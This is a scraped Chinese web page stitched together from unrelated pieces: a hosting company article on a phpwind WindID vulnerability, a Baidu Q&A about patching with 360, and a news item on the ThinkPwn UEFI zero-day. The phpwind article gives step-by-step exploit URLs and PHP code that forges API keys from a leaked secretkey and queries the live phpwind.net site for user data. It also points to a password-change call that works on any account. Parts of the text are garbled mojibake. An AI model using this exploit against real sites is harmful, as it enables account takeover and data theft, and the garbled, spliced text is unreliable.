360高危漏洞修复不了 能不能修复??

PHPWIND可拿shell的高危漏洞修补 - 无忧主机
自始至终,以提供稳定、高性能的美国、香港免备案php虚拟主机产品为己任,以用户极高满意为生存价值,以产品的可靠性为生命线,以网络零中断为终身奋斗目标
近期phpwind爆了一个高危漏洞,下面无忧主机小编跟大家说说下这个漏洞的问题。借鉴的国内漏洞网站测试的结果。
首先在src/applications/windidserver/api/controller/AppController.php内代码:
public function listAction() {
$result = $this-&_getAppDs()-&getList();
$this-&output($result);
如何获取可以访问接口的key?
查看用户上传头像页面就可以知道了:
/phpwind/src/windid/service/user/srv/WindidUserService.php
内的代码:
$key = WindidUtility::appKey($appId, $time, $appKey, array('uid'=&$uid, 'type'=&'flash'), array('uid'=&'undefined'));
去头像页面查看一下源文件
http://localhost/phpwind/index.php?m=profile&c=avatar&_left=avatar
phpwind代码截图
解出urldecode得:
http://localhost/phpwind/windid/index.php?m=api&c=avatar&a=doAvatar&uid=1&windidkey=f5b35f56ce18ecaafad874&time=&clientid=1&type=flash&avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418
&avatar=http://localhost/phpwind/windid/attachment/avatar/000/00/00/1.jpg?r=88418
然后记得,还需要POST一个uid等于undefined
把doAvatar换成list,avatar换成app得:
http://localhost/phpwind/windid/index.php?m=api&c=app&a=list&uid=1&windidkey=f5b35f56ce18ecaafad874&time=&clientid=1&type=flash
POST:uid=undefined
{+:{“id”:+,”name”:”phpwind9.0″,”siteurl”:”http:\/\/localhost\/phpwind”,”siteip”:””,”secretkey”:&#dcdd733c7ca624e162″,”apifile”:”windid.php”,”charset”:”gbk”,”issyn”:+,”isnotify”:+}}
phpwind问题情况截图
拿到这个key,我可以做的事情太多了,用户体系内的所有事情我都可以做了。
在官网测试了一下,拿到key后测试一下读取一个用户的资料:
$secretkey = '308c6c43a*****279dd61dd80e8d59bd';
$c = 'user';
$a = 'get';
$data = array('uid'=&'9;);
$time = time();
$key = appKey('1', time(), $secretkey, array('userid'=&658925), $data);
echo post('http://www.phpwind.net/windid/index.php?m=api&c='.$c.'&a='.$a.'&windidkey='.$key.'&time='.$time .'&clientid=1&userid=9;,$data);
function post($uri,$data) {
$ch = curl_init ();
curl_setopt ( $ch, CURLOPT_URL, $uri );
curl_setopt ( $ch, CURLOPT_POST, 1 );
curl_setopt ( $ch, CURLOPT_HEADER, 0 );
curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, 1 );
curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );
$return = curl_exec ( $ch );
curl_close ( $ch );
function appKey($apiId, $time, $secretkey, $get, $post) {
$array = array('m', 'c', 'a', 'windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token', 'Filename', 'Upload', 'token');
$str = '';
ksort($get);
ksort($post);
foreach ($get AS $k=&$v) {
if (in_array($k, $array))
$str .=$k.$v;
foreach ($post AS $k=&$v) {
if (in_array($k, $array))
$str .=$k.$v;
return md5(md5($apiId.'||'.$secretkey).$time.$str);
phpwind问题代码截图
{“uid”:&#″,”username”:”phpwind”,”email”:””,”safecv”:&#1de”,”regdate”:&#940″,”regip”:””}
在User的api内还有一个edit的接口,可以修改任意用户的密码,调用它,不填写old_password,将可以修改任意用户的密码,不会验证原密码的。
这整个过程就是phpwind的漏洞被利用的过程,现在官方已经有了补丁,希望看到这篇文章的站长们尽快打上最新的补丁吧。
无忧主机相关文章推荐阅读:
本文地址:/phpwind/16300.html
喜欢本文或觉得本文对您有帮助,请分享给您的朋友 ^_^
无忧主机资质:(十二年旗舰品牌)
相关技术帮助文档
技术帮助文档分类电脑上的有好多高危漏洞能不能修复啊?修复了会怎样,不修复又会怎样啊?_百度知道
电脑上的有好多高危漏洞能不能修复啊?修复了会怎样,不修复又会怎样啊?
提问者采纳
建议你修复,修复了会减少被病珐触粹吠诔杜达森惮缉毒侵入,减少软件自身出错,增加软件和系统之间的兼容性。反之,不修复容易感染病毒,容易出错,容易不兼容。但不建议你直接修复,先下载安装一个360安全卫士,通过安全卫士自带的漏洞修复功能进行下载和安装,比你直接修复的方法要好很多。
来自团队:
其他类似问题
为您推荐:
其他7条回答
你好朋友个人建议你使用360安全卫士的漏洞修复功能扫描一下,把它提示的高危漏洞修复了就可以了。它的漏洞修复是智能的可以过滤那些没有必要或是珐触粹吠诔杜达森惮缉已经过期的漏洞补丁,用它修复比较可靠,修复漏洞后可以增加系统的安全性和稳定性。
修复是肯定是要修复的,但不要选择性的修复的,如不修复的话,电脑会很容易中毒的,但如果你全部修复的话,可能会让你的电脑很卡的,不好用的。建议你用360安全卫士进行系统漏的修复的,他的修复是智能的,会自动忽略不需要修复的漏洞,比较可靠的,我都是用360安全卫士修复的,也没出过什么问题啊
一定要修复的,不修复的话电脑运行会很慢,而且容易受病毒侵害,如果你是一个网购迷那帐号就很不安全啦!
必须修复,修复了安全,不修复就像家里洞门打开,小偷如入无人之境
360卫士修复
可以修复啊,修复完毕就OK啦,没事的
我觉得不修复,因为修复漏洞可以让你的电脑内存下降,所以会变卡。
高危漏洞的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁笔记本电脑高危漏洞有哪些 怎么修复笔记本电脑高危漏洞 - 泡泡网
新漏洞曝光:多种品牌笔记本电脑面临危险!
日期: 09:49:26
投稿:大泡泡
来源:泡泡网
导语笔记本电脑高危漏洞有哪些,由于系统自身的复杂性,笔记本有一两个系统漏洞还是可以理解的。但是最近曝光的一个名叫零日漏洞的系统漏洞还没有修补的办法,这一漏洞波及的还是两个国际笔记本电脑大厂。
笔记本电脑高危漏洞有哪些,由于系统自身的复杂性,笔记本有一两个系统漏洞还是可以理解的。但是最近曝光的一个名叫零日漏洞的系统漏洞还没有修补的办法,这一漏洞波及的还是两个国际笔记本电脑大厂。独立安全研究人员Dmytro Oleksiuk今天详细介绍了一个未修补的UEFI固件零日漏洞,已确认可以威胁部分联想、惠普笔记本。这个漏洞存在于多种UEFI固件包里的系统管理模块(SMM)源代码中,Oleksiuk就此写了一段验证性代码ThinkPwn,可利用该漏洞关闭UEFI写保护,随后任意修改设备固件。甚至,安全启动选项也可以被关闭,Windows 10内建的设备保护等安全措施同样能被绕过。这段代码目前运行于UEFI级别,可在每次启动时直接访问,而且理论上可以修改运行在系统级别上,同时插入恶意代码。Oleksiuk表示,最初发现受影响的只有联想笔记本,但稍后他发现,其他一些OEM产品也被波及,包括惠普的部分产品。联想回应称,该漏洞并非来自自家代码,而是源于Intel提供的IBV(独立BIOS供应商)代码,另外看上去这个漏洞并不新鲜,Intel工程师2014年就修复了,但不知为何又出现在了多家厂商的UEFI之中。但是目前,尚无针对此漏洞的修复,联想、惠普都没有。(本文来自:)
MX6什么时候上市?近日,魅族官方将于7月19日上市。新一代魅族产…

我要回帖

更多关于 高危漏洞不修复没事吧 的文章

 

随机推荐